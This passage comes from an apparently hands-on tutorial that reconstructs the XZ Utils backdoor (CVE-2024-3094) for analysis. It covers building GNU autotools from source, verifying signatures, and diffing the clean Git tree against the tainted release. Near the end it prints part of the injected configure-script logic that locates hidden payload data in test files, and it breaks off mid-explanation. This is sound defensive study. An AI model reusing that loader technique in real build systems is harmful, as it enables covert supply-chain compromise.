xz_tarball_uncompress_dependency_pkgs=(
xz-utils
)
apt install "${xz_tarball_uncompress_dependency_pkgs[@]}"
```
Then run the following command to extract the Autoconf source archive:
```bash
tar_opts=(
# Uncompress and extract the specified archive
--extract
--file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"
```
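If you'd like to see the `--extract`/`--file` option pair in action on a harmless archive first, the following sketch (hypothetical file names) creates and then extracts a small xz-compressed tarball; note that modern GNU tar detects the compression format automatically on extraction:

```bash
# Build a tiny xz-compressed tarball to practice on
mkdir -p demo-src
printf 'hello\n' > demo-src/hello.txt
tar --create --xz --file demo-src.tar.xz demo-src
rm -r demo-src
# Extract it again; no explicit --xz flag is needed here
tar --extract --file demo-src.tar.xz
cat demo-src/hello.txt
```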
Now we can try building Autoconf from source. As the build
configuration program (autoconf-2.72/configure) creates build files
in your working directory, let's switch the working directory to the
Autoconf source directory to avoid writing files outside of it:
```bash
cd autoconf-2.72
```
Then we can iteratively run the build configuration program to satisfy
the build requirement and finally, generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
The Autoconf build configuration program prints the following error
message, which indicates that it requires [the GNU M4 software](https://www.gnu.org/software/m4/m4.html)
to be installed:
```text
configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.
```
We can install it by running the following command _as root_:
```bash
apt install m4
```
Now we can run the build configuration program again:
```bash
./configure
```
If you see the following output and that the Makefile file appears in
the source tree, it means that the build configuration of the GNU
Autoconf software has finished successfully:
```
configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands
You are about to use an experimental version of Autoconf. Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.
Below you will find information on the status of this version of Autoconf.
...stripped...
```
We need [the GNU Make software](https://www.gnu.org/software/make/) to
read the Makefile and build the GNU Autoconf software; run the following
command _as root_ to install it:
```bash
apt install make
```
Now we can start building the GNU Autoconf software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed up the build process by using multiple processes at the
# same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
:::info
**Note:**
* The `$(_command_)` portion of the command is in [the Bash scripting language's _command substitution_ syntax](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html), it will be replaced by the content outputted by the execution of the _command_.
* The `${_variable_name_}` portion of the command is in [the Bash scripting language's _parameter expansion_ syntax for regular variables](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), it will be replaced by the _variable_name_ variable's value.
:::
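A minimal illustration of both constructs together:

```bash
# Command substitution: capture the output of the pwd command
current_dir="$(pwd)"
# Parameter expansion: substitute the variable's value into the string
echo "The working directory is ${current_dir}"
```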
If the command's *exit status code* is zero, it means that the build was successful. Run the following command right after the `make` command's invocation to verify this:
```bash
echo "${?}"
```
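As a quick sanity check of the idiom, the shell builtins `true` and `false` exit with status 0 and 1 respectively:

```bash
true
echo "${?}"  # prints 0: the previous command succeeded
false
echo "${?}"  # prints 1: the previous command failed
```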
Then run the following command to install the built GNU Autoconf software to the system:
```bash
make install
```
After the installation of the GNU Autoconf software you should have the
`autoconf` command in your command search PATH (/usr/local/bin, to be
specific). You may check the version of the installation by running the
following command:
```bash
autoconf --version
```
Let's run the following command to switch the working directory back to
the initial one, as we have no further business with the Autoconf source
tree:
```bash
cd /project
```
### GNU Automake
The installation of [the GNU Automake software](https://www.gnu.org/software/automake/)
can be started by locating the download URL of [the 1.16.5 release
archive](https://ftp.gnu.org/gnu/automake/automake-1.16.5.tar.xz) and
[its respective PGP signature file](https://ftp.gnu.org/gnu/automake/automake-1.16.5.tar.xz.sig)
and download them to the working directory using your web browser.
Then, as usual, verify that the release archive we downloaded was
actually made by a GNU Automake project maintainer. We can determine
who actually signed the release archive by running the following
command:
```bash
gpg_opts=(
# Verify the authenticity of the automake-1.16.5.tar.xz file using
# the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Mon Oct 4 03:23:30 2021 UTC
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key
```
The PGP signature can't be checked because we don't have the signer's
public key in our PGP keyring. We can retrieve the public key using the
key ID from the previous output by running the following command:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian (hkps://keys.openpgp.org);
# however, it didn't work reliably during the writing of this
# tutorial, thus another popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"
```
It should have the following output:
```output
gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
:::info
**Note:**
If you still can't retrieve the public key, the connection might have
been blocked by your network's firewall. You could also try using the
`hkp://keyserver.ubuntu.com:80` keyserver, which should get through
such a hostile networking environment.
:::
As shown by [the GNU Automake project page](https://savannah.gnu.org/projects/automake/),
Jim Meyering is indeed the one who released the packages, so the public
key we've fetched here is probably legit:
![Screenshot of the "Latest News" section of the GNU Automake project
page, meyering(Jim Meyering) can be found in the post author information
(outlined in red)](https://hackmd.io/_uploads/Hybj7gkg0.png "Screenshot of the \"Latest News\" section of the GNU Automake project page")
We can now proceed to verify the 1.16.5 GNU Automake source archive:
```bash
gpg_opts=(
# Verify the authenticity of the automake-1.16.5.tar.xz file using
# the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
# signer's PGP public key in your keyring)
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicates that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
We can now proceed to extract the GNU Automake source archive, run the
following command to do so:
```bash
tar_opts=(
# Uncompress and extract the specified archive
--extract
--file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"
```
Now we can try building Automake from source. As the build
configuration program (automake-1.16.5/configure) creates build files
in your working directory, let's switch the working directory into the
GNU Automake 1.16.5 source directory to avoid writing files outside of
it:
```bash
cd automake-1.16.5
```
Then we can iteratively run the build configuration program to satisfy
the build requirements and finally generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
If you see the following output, the build configuration should be
completed without errors:
```output
configure: creating ./config.status
config.status: creating Makefile
config.status: creating pre-inst-env
```
:::info
**Note:**
The build configuration program did print some warning messages;
however, all of them seem to only affect the automated software
testing of the GNU Automake software, which we don't really need in
this tutorial, so let's let them slide.
:::
Now we can start building the GNU Automake software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed up the build process by using multiple processes at the
# same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
If the command's exit status code is zero, it means that the build was
successful. Run the following command right after the `make` command's
invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Automake
software to the system:
```bash
make install
```
After the installation of the GNU Automake software you should have the
`automake` command in your command search PATH (/usr/local/bin). You
may check the version of the installation by running the following
command:
```bash
automake --version
```
Let's head back to the initial working directory, as we no longer have
any business with the Automake source tree:
```bash
cd /project
```
### GNU Libtool
The installation of [the GNU Libtool software](https://www.gnu.org/software/libtool/)
can be started by locating the download URL of the 2.4.7.4 release
archive... until you notice that there's no such release version called 2.4.7.4:
![The Downloads section of the GNU Libtool home page shows that the latest released version is "2.4.7"](https://hackmd.io/_uploads/ryJnjNleR.png "The Downloads section of the GNU Libtool home page shows that the latest released version is \"2.4.7\".")
![The release package download website shows that the version of the latest release tarballs is also "2.4.7"](https://hackmd.io/_uploads/rJ_toVlxR.png "The release package download website shows that the version of the latest release tarballs is also \"2.4.7\".")
According to the full version string `2.4.7.4-1ec8f-dirty` we found earlier, it appears that the `.4` part of the GNU Libtool version string indicates a development revision that has deviated from the 2.4.7 release by 4 revisions and has the revision fingerprint 1ec8f. By searching the revisions committed to the repository after the 2.4.7 release and matching the revision fingerprints, we can find that the GNU Libtool software that created the build system files seems to be based on [the "libtool: passthru '-Werror' flags" revision](https://git.savannah.gnu.org/cgit/libtool.git/commit/?id=1ec8fa2).
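The `_base-version_-_count_-_fingerprint_` shape is the same one `git describe` produces for commits past a release tag. A toy repository (hypothetical tag and commit messages) reproduces the pattern:

```bash
# Create a throwaway repository with a tag and 4 commits on top of it
git init --quiet describe-demo
cd describe-demo
git -c user.name='Demo' -c user.email='demo@example.org' \
    commit --quiet --allow-empty --message 'release 2.4.7'
git tag v2.4.7
for i in 1 2 3 4; do
    git -c user.name='Demo' -c user.email='demo@example.org' \
        commit --quiet --allow-empty --message "change ${i}"
done
# Prints something like v2.4.7-4-g<abbreviated-commit-hash>
git describe --tags
cd ..
```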
We can fetch the GNU Libtool source tree of this specific revision from [the upstream Git repository URL listed in the Clone section of the libtool.git Git repository summary page](https://git.savannah.gnu.org/cgit/libtool.git/) by running the following commands:
```bash
git_clone_opts=(
# Specify history fetch depth to 200 revisions from the default
# branch's tip revision
--depth=200
)
git clone "${git_clone_opts[@]}" \
https://git.savannah.gnu.org/git/libtool.git \
libtool-git
cd libtool-git
git checkout 1ec8fa2
```
:::info
**Note:**
If the following output is printed during the `git checkout` command, it indicates that your history fetch depth is too shallow:
```output
error: pathspec '1ec8fa2' did not match any file(s) known to git
```
you can retry the operation *after deepening the history fetch depth* by running the following command after switching your working directory to the libtool-git directory:
```bash
git_fetch_opts=(
# Specify history fetch depth to _more_revision_quantities_
# revisions from the default branch's tip revision
--depth=_more_revision_quantities_
)
git fetch "${git_fetch_opts[@]}"
```
:::
Now we can try building GNU Libtool from source. Unfortunately, the INSTALL installation document exists neither in the source tree nor at [the URL referenced by the GNU Libtool 1ec8fa2 revision README](http://git.savannah.gnu.org/cgit/libtool.git/tree/INSTALL):
![Screenshot of the portion of the 1ec8fa2 revision GNU Libtool README document that mentions the INSTALL installation document(highlighted in yellow) and its on-website URL(outlined in red)](https://hackmd.io/_uploads/rkzyndMlC.png "Screenshot of the portion of the 1ec8fa2 revision GNU Libtool README document that mentions the INSTALL installation document and its on-website URL")
![Screenshot of the page that is supposed to host the on-website GNU Libtool INSTALL document, which instead shows an error message claiming "Path not found"](https://hackmd.io/_uploads/SJihhdGe0.png "Screenshot of the page that is supposed to host the on-website GNU Libtool INSTALL document, which instead shows an error message claiming \"Path not found\"")
As a fallback option we refer to [the current revision of the GNU Libtool README documentation](https://git.savannah.gnu.org/cgit/libtool.git/tree/README.md), which now references [the existing INSTALL installation document of the GNU Automake software instead](https://git.savannah.gnu.org/cgit/automake.git/tree/INSTALL):
![A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document](https://hackmd.io/_uploads/SyRrkYGl0.png "A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document")
As the source build bootstrapping program (libtool-git/bootstrap) expects to be run with the working directory set to the source tree, be sure to change the working directory, if you haven't done so in the previous step, by running the following command:
```bash
cd /project/libtool-git
```
Then run the source build bootstrapping program by running the following command:
```bash
test -f configure || ./bootstrap
```
which should print the following error messages, indicating that we haven't satisfied the source build bootstrapping prerequisites:
```output
bootstrap: error: Prerequisite 'help2man' not found. Please install it, or
bootstrap: 'export HELP2MAN=/path/to/help2man'.
bootstrap: error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap: 'export MAKEINFO=/path/to/makeinfo'.
```
To install the help2man prerequisite, we can run the following command to search the APT software package management system:
```bash
apt search help2man
```
which reveals that there's a package that can be installed:
```output
Sorting... Done
Full Text Search... Done
help2man/jammy 1.49.1 amd64
Automatic manpage generator
```
However this isn't the case for the `makeinfo` prerequisite:
```output
root@cve-2024-3094:/project/libtool-git# apt search makeinfo
Sorting... Done
Full Text Search... Done
root@cve-2024-3094:/project/libtool-git#
```
Fortunately, we can locate which package provides this prerequisite by using the `apt-file` utility. First, install the utility by running the following command _as root_:
```bash
apt install apt-file
```
then, run the following command _as root_ to fetch the metadata required by `apt-file`'s operation:
```bash
apt-file update
```
We can then query the package that provides the `makeinfo` utility by running the following command:
```bash
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/makeinfo$'
```
According to the following `apt-file` command output, we can confirm that the texinfo package provides the `makeinfo` command:
```
texinfo: /usr/bin/makeinfo
```
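The `/s?bin/makeinfo$` search pattern is a regular expression: `s?` makes the `s` optional (so both `bin` and `sbin` directories match) and `$` anchors the match to the end of the path. A quick `grep -E` run over some sample paths (hypothetical) shows what it would and wouldn't match:

```bash
# Only the first two paths match; the third fails the '$' anchor
printf '%s\n' \
    /usr/bin/makeinfo \
    /usr/sbin/makeinfo \
    /usr/bin/makeinfo-wrapper \
    | grep -E '/s?bin/makeinfo$'
```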
:::info
**Note:**
We can also use [the Ubuntu Packages Search website](https://packages.ubuntu.com/) to query the package that provides the specific file.
:::
We can now run the following command *as root* to install all the missing packages:
```bash
libtool_bootstrap_prerequisite_pkgs=(
help2man
texinfo
)
apt install "${libtool_bootstrap_prerequisite_pkgs[@]}"
```
We can now retry the source build bootstrapping program by running the following command:
```bash
test -f configure || ./bootstrap
```
If you see the following output then the bootstrapping process has completed successfully:
```output
bootstrap: Done. Now you can run './configure'.
```
:::info
**Note:**
If you're in a networking environment where Internet access is only available via an HTTP proxy, the source build bootstrapping program will print the following error:
```output
Cloning into 'gnulib'...
fatal: unable to look up git.savannah.gnu.org (port 9418) (Temporary failure in name resolution)
```
You can run the following command to patch the gnulib submodule's repository address to work around the problem:
```bash
current_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
# Modify the input file in-place, saving a backup copy with a
# timestamped suffix while doing so
--in-place=".orig.${current_timestamp}"
)
sed \
"${sed_opts[@]}" \
's@git://git.savannah.gnu.org/gnulib.git@https://git.savannah.gnu.org/git/gnulib.git@g' \
.gitmodules
```
:::
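A toy run of the same `sed --in-place=SUFFIX` idiom on a hypothetical file shows the backup behavior:

```bash
printf 'url = git://example.org/gnulib.git\n' > demo.gitmodules
sed --in-place='.orig' \
    's@git://example.org@https://example.org@g' demo.gitmodules
cat demo.gitmodules       # the rewritten file
cat demo.gitmodules.orig  # the untouched backup copy
```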
Then we can iteratively run the build configuration program to satisfy the build requirements and finally generate the Makefile to actually build and install the software. Run the following command to do so:
```bash
./configure
```
First of all, the build configuration program complains about a missing
C compiler:
```output
configure: error: no acceptable C compiler found in $PATH
```
which can be fixed by installing a compatible C compiler like GCC;
install it by running the following command _as root_:
```bash
apt install gcc
```
We can now retry the build configuration program by running the following command:
```bash
./configure
```
This time the build configuration should complete without errors:
```output
...stripped...
config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
root@cve-2024-3094:/project/libtool-git# echo "${?}"
0
root@cve-2024-3094:/project/libtool-git#
```
Now we can start building the GNU Libtool software by running the following commands:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed up the build process by using multiple processes at the
# same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
If the command's exit status code is zero, it means that the build was successful. Run the following command right after the `make` command's invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Libtool software to the system:
```bash
make install
```
After the installation of the GNU Libtool software you should have the `libtool` command in your command search PATH (/usr/local/bin). You may check the version of the installation by running the following command:
```bash
libtool --version
```
Let's run the following command to switch the working directory back to the initial one, as we have no further business with the GNU Libtool source tree:
```bash
cd /project
```
### GNU Gettext
The installation of the 0.22.4 version of [the GNU Gettext software](https://www.gnu.org/software/gettext/)
can be started by locating the download URL of [the 0.22.4 version GNU Gettext release
archive](https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.4.tar.lz)
and [its respective PGP signature file](https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.4.tar.lz.sig)
and download them to the working directory using your web browser.
Then, as usual, verify that the release archive we downloaded was
actually made by one of the GNU Gettext project maintainers. We can
determine who actually signed the release archive by running the
following command:
```bash
gpg_opts=(
# Verify the authenticity of the gettext-0.22.4.tar.lz file using
# the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key
```
The PGP signature can't be checked because we don't have the signer's
public key in our PGP keyring. We can retrieve the public key using the
key ID from the previous output by running the following command:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian (hkps://keys.openpgp.org);
# however, it didn't work reliably during the writing of this
# tutorial, thus another popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"
```
It should have the following output:
```output
gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
:::info
**Note:**
If you still can't retrieve the public key, the connection might have
been blocked by your network's firewall. You could also try using the
`hkp://keyserver.ubuntu.com:80` keyserver, which should get through
such a hostile networking environment.
:::
As shown by [the GNU Gettext project group memberlist page](https://savannah.gnu.org/project/memberlist.php?group=gettext),
Bruno Haible <bruno@clisp.org> is indeed one of the GNU
Gettext project maintainers, so the public key we've fetched here is
probably legit:
![Screenshot of the "Active members on duty" section of the GNU Gettext project
group member list page, group administrator Bruno Haible can be found in the list](https://hackmd.io/_uploads/Sys13WEl0.png "Screenshot of the \"Active members on duty\" section of the GNU Gettext project
group member list page, group administrator Bruno Haible can be found in the list")
We can now proceed to verify the 0.22.4 version of the GNU Gettext release archive:
```bash
gpg_opts=(
# Verify the authenticity of the gettext-0.22.4.tar.lz file using
# the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
# signer's PGP public key in your keyring)
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicates that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
Before we extract the 0.22.4 version of the GNU Gettext release archive,
we need to install the software required to extract lzip-compressed tar
archive files (as indicated by the .lz filename extension) by running the
following command _as root_:
```bash
lzip_decompress_dependency_pkgs=(
lzip
)
apt install "${lzip_decompress_dependency_pkgs[@]}"
```
We can now proceed to extract the 0.22.4 version of the GNU Gettext
release archive; run the following command to do so:
```bash
tar_opts=(
# Uncompress and extract the specified archive
--extract
--file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"
```
Now we can try building the 0.22.4 version of the GNU Gettext
software from source. According to the installation document
(gettext-0.22.4/INSTALL), the build procedure is similar to the
other GNU build system components, though the build configuration
program is already shipped in the release archive so we can directly
use that to configure our build.
As the build configuration program(gettext-0.22.4/configure)
will create build files in your working directory let's switch the
working directory into the GNU Gettext 0.22.4 source tree to avoid
writing files outside of it:
```bash
cd gettext-0.22.4
```
Then we can iteratively run the build configuration program to satisfy
the build requirements and finally generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
If the command's exit status code is zero, it means that the build
configuration was successful. Run the following command right after
the `./configure` command's invocation to verify it:
```bash
echo "${?}"
```
Now we can start building the GNU Gettext software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed up the build process by using multiple processes at the
# same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
If the command's exit status code is zero, it means that the build was
successful. Run the following command right after the `make`
command's invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Gettext
software to the system:
```bash
make install
```
After the installation of the GNU Gettext software you should have
the `gettext` command in your command search PATH (/usr/local/bin).
You may check the version of the installation by running the
following command:
```bash
gettext --version
```
Let's head back to the initial working directory, as we no longer
have any business with the GNU Gettext source tree:
```bash
cd /project
```
## Generate the build system files
Now that the software dependencies are installed, let's start generating the build system files, acting in the project maintainer's role.
As the XZ Utils autogen.sh program requires the working directory to be set to the checked-out source directory, and to avoid polluting the tree outside of it with build artifacts, run the following command to switch the working directory:
```bash
cd xz-git
```
...and run the following command to generate the build system files:
```bash
./autogen.sh
```
which will fail with the following message:
```
po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.
```
We can search for packages that provide the `po4a` program using the aforementioned `apt-file` utility by running the following commands:
```bash
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'
```
which should have the following output, indicating that a package of the same name provides the program:
```output
po4a: /usr/bin/po4a
```
We can satisfy the dependency by running the following command _as root_:
```bash
apt install po4a
```
The next iteration of the `./autogen.sh` command prints the following error message:
```output
doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.
```
for which we can, again, use the `apt-file` utility to locate the package that provides the program. We leave that step to you and simply install the resulting dependency package by running the following command _as root_:
```bash
apt install doxygen
```
This time the `./autogen.sh` command invocation should have the following output, indicating that it has successfully generated all the files:
```output
Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0
```
Let's return to the initial working directory, as the following operations don't need the current one, by running the following command:
```bash
cd /project
```
## Comparing the difference between the clean source tree and the tainted release archive
According to [the oss-security mailing list discussion thread](https://www.openwall.com/lists/oss-security/2024/03/29/4), it is the build system files, which are not in [the upstream Git repository](https://git.tukaani.org/?p=xz.git), that were modified to contain the logic to extract the malicious object code file from the test data.
For ease of comparing differences, let's install a helper utility that supports plaintext syntax highlighting: [bat: A cat(1) clone with wings](https://github.com/sharkdp/bat). We can install it by running the following command _as root_:
```bash
apt install bat
```
:::info
**Note:**
Due to [a command name conflict](https://github.com/sharkdp/bat/issues/656) the `bat` command shipped in older versions of Debian and its derivatives is renamed to `batcat`. To increase interoperability with other GNU/Linux distributions, let's rename it back to the upstream name by running the following command _as root_:
```bash
dpkg_divert_opts=(
# Rename the file to /usr/bin/bat
--divert /usr/bin/bat
# Do the actual rename operation, as the package is already
# installed
--rename
# Add a new diversion for the package installed
# /usr/bin/batcat file
--add /usr/bin/batcat
)
dpkg-divert "${dpkg_divert_opts[@]}"
```
:::
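If you'd rather not modify the system with `dpkg-divert`, a purely shell-side workaround is to resolve whichever command name exists at run time (a sketch; falls back to plain `cat` when neither is installed):

```bash
# Prefer 'bat', then Debian/Ubuntu's 'batcat', then fall back to 'cat'
pager_cmd="$(command -v bat || command -v batcat || echo cat)"
echo "Using: ${pager_cmd}"
```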
We can generate the content differences between the 5.6.1 version checked out from the Git repository and the potentially evil-actor-prepared 5.6.1 release source tree, and save them to a file, by running the following command:
```bash
diff_opts=(
# Use the unified diff format
--unified
# Exclude files that we aren't interested in:
#
# Software documentation
--exclude='ChangeLog'
--exclude='doc'
# Translation files
--exclude='*.po'
--exclude='*.pot'
--exclude='*.gmo'
--exclude='po4a'
# Git repository
--exclude='.git'
# Compare recursively between two directory trees
--recursive
)
# Generate the unified diff of the git versus released XZ Utils 5.6.1
# source tree, and redirect the output to the
# xz-vanilla-vs-tainted.diff diff file
diff "${diff_opts[@]}" xz-git xz-5.6.1 >xz-vanilla-vs-tainted.diff
```
Here's the [reference result](https://pastebin.com/dFg2a57n).
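To see the same `diff` invocation shape in miniature, here is a toy pair of directory trees (hypothetical names); note that `diff` exits with a non-zero status when differences are found, which is expected here:

```bash
mkdir -p tree-a tree-b
printf 'unchanged\nold line\n' > tree-a/file.txt
printf 'unchanged\nnew line\n' > tree-b/file.txt
# The '|| true' tolerates diff's exit status of 1 (differences found)
diff --unified --recursive tree-a tree-b > trees.diff || true
cat trees.diff
```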
:::info
**Note:**
The `>_file_` part of the diff command is in [the output redirection
syntax of the Bash scripting language](https://www.gnu.org/software/bash/manual/html_node/Redirections.html#Redirecting-Output), which
saves the content from the standard output device of the command to
the specified _file_.
By using this feature we can avoid piping the output directly to the `bat` utility, which in this case won't be able to apply the syntax highlighting unless we explicitly specify what `--language` the input data is in.
:::
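A toy run (hypothetical file name) of output redirection, including the related `>>` append form for completeness:

```bash
echo 'first'  > redirect-demo.txt   # '>' creates (or truncates) the file
echo 'second' >> redirect-demo.txt  # '>>' appends to the file instead
cat redirect-demo.txt
```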
Then we can run the following command to inspect the content differences:
```bash
bat xz-vanilla-vs-tainted.diff
```
you should be able to see the following output:
![Content difference inspection using the `bat` pager utility](https://hackmd.io/_uploads/rkdcnvIlR.png "Content difference inspection using the `bat` pager utility")
:::info
**Note:**
By default the `bat` utility launches the `less` pager on data larger than the terminal window, thus the keybindings supported by the `less` pager can be used, including but not limited to the following:
* Press the `q` key to exit the pager program.
* Press the `g` key to jump to the first line of the file.
* Press the `G` key to jump to the last line of the file.
+ Key-in the number of lines to jump, then the `G` key to jump to the specific line(due to the additional formatting caused by `bat`, it may not be the exact line that you intend to jump).
+ Press the `↑` / `j` key to move down a line.
+ Press the `↓` / `k` key to move up a line.
+ Press the `Page Up(Pgup)` key to move up a page.
+ Press the `Page Down(Pgdown)` key to move up a page.
:::
## Extract the injected object file from the test file
From the content differences we can notice that the tainted XZ Utils
5.6.1 release source tree has its build configuration program and the
m4/build-to-host.m4 M4 macro file modified to contain suspicious
logic, where the former is generated from the latter by GNU
Autoconf.
Unfortunately, we aren't experts in reading M4 macros, so we shall temporarily put them aside and only analyse the resulting build
configuration program, as it is in a much more readable Bourne-shell-compatible script format. Let's analyse the build configuration script in a top-down manner.
:::info
**Note: About the unified diff format:**
* The lines starting with `--- ` indicate the file before the
modification.
* The lines starting with `+++ ` indicate the file after the
modification.
* The lines starting with `@@ ` mark the start of a _hunk_(and the end of the previous hunk, if one exists).
+ The integer pairs in the hunk marker lines indicate the beginning line number and line count of the hunk in each file, where the pair prefixed with a hyphen-minus character(`-`) refers to the file before modification and the pair prefixed with a plus character(`+`) refers to the file after modification.
* The hunk lines starting with a space character(` `) are unchanged by the modification.
* The hunk lines starting with a plus character(`+`) are inserted by the modification.
* The hunk lines starting with a hyphen-minus character(`-`) are removed by the modification.
Take the following diff hunk as an example:
```diff
--- xz-git/build-aux/config.sub 2024-04-11 22:31:56.587698017 +0800
+++ xz-5.6.1/build-aux/config.sub 2024-03-09 16:16:40.000000000 +0800
@@ -1748,7 +1753,8 @@
| skyos* | haiku* | rdos* | toppers* | drops* | es* \
| onefs* | tirtos* | phoenix* | fuchsia* | redox* | bme* \
| midnightbsd* | amdhsa* | unleashed* | emscripten* | wasi* \
- | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr*)
+ | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr* \
+ | fiwix* )
;;
# This one is extra strict with allowed versions
sco3.2v2 | sco3.2v[4-9]* | sco5v6*)
```
This diff hunk features lines 1748 to 1754 of the xz-git/build-aux/config.sub file(7 lines in total, including line 1751, which is removed by the modification), corresponding to lines 1753 to 1760 of the xz-5.6.1/build-aux/config.sub file(8 lines in total, including lines 1756 and 1757, which are inserted by the modification).
Refer to [Detailed Description of Unified Format | GNU Diffutils manual](https://www.gnu.org/software/diffutils/manual/html_node/Detailed-Unified.html#Detailed-Description-of-Unified-Format) for more information.
:::
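The hunk anatomy described above can be reproduced with a throwaway two-file example (the old.txt/new.txt file names and contents are made up for illustration):

```shell
# Create two scratch files that differ only on their second line
printf 'a\nb\nc\n' > old.txt
printf 'a\nB\nc\n' > new.txt

# diff exits with status 1 when the files differ, hence the `|| true`
diff --unified old.txt new.txt || true
```

The output should contain a `--- old.txt`/`+++ new.txt` header pair, a single `@@ -1,3 +1,3 @@` hunk marker, and the ` a`, `-b`, `+B`, ` c` hunk lines.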
:::info
**Note:**
In case you need another terminal window to read the full file, you can get another container shell by running the following command _as root_ in a separate terminal window:
```bash
docker_exec_opts=(
# Allow bash interactive mode to properly function
--interactive
--tty
)
bash_opts=(
# Launch a login shell that reads the user's configuration files
--login
)
docker exec "${docker_exec_opts[@]}" cve-2024-3094 \
bash "${bash_opts[@]}"
```
:::
Let's examine the next hunk of the build configuration program:
```diff
@@ -18683,8 +18683,16 @@
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
gl_sed_escape_for_make_2='s,\$,\\$$,g'
case `echo r | tr -d '\r'` in
```
Line 18686 assigns the `gl_am_configmake` variable with the standard output of the following command:
```bash
